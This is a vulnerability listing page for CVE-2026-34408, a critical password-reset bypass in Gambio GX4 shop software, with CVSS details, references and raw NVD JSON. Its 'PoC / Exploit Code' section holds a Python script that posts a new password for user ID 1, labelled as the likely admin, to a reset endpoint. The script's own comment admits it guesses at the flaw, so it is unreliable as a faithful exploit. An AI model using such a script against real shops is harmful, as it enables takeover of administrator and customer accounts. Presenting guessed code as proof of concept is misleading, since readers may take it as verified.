CVE-2026-34408

Description

An issue was discovered in Gambio 4.9.2.0 (patched in 2024-02 v1.0.0 for GX4 v4.0.0.0 to v4.9.2.0). The password reset function can be bypassed to set arbitrary passwords for arbitrary accounts if the ID is known.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Gambio GX4 >= 4.0.0.0

Gambio GX4 <= 4.9.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL and User ID
target_url = "https://example.com/password_reset.php"
user_id = "1"  # Often admin ID is 1
new_password = "HackedPassword123"

# Payload exploiting the bypass
payload = {
    "user_id": user_id,
    "new_password": new_password,
    "confirm_password": new_password
    # The vulnerability implies that validation tokens (like 'token' or 'hash') are missing or not checked properly
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Password reset potentially successful. Try logging in.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34408/
[4] VulDB https://vuldb.com/cve/CVE-2026-34408
[5] https://herolab.usd.de/security-advisories/usd-2024-0002/
[6] https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34408", "sourceIdentifier": "[email protected]", "published": "2026-05-05T14:16:08.623", "lastModified": "2026-05-06T18:16:03.223", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Gambio 4.9.2.0 (patched in 2024-02 v1.0.0 for GX4 v4.0.0.0 to v4.9.2.0). The password reset function can be bypassed to set arbitrary passwords for arbitrary accounts if the ID is known."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://herolab.usd.de/security-advisories/usd-2024-0002/", "source": "[email protected]"}, {"url": "https://www.gambio.de/forum/threads/wichtiges-security-update-2024-02-v1-0-fuer-gx4-v4-0-0-0-bis-v4-9-2-0.50896/", "source": "[email protected]"}]}}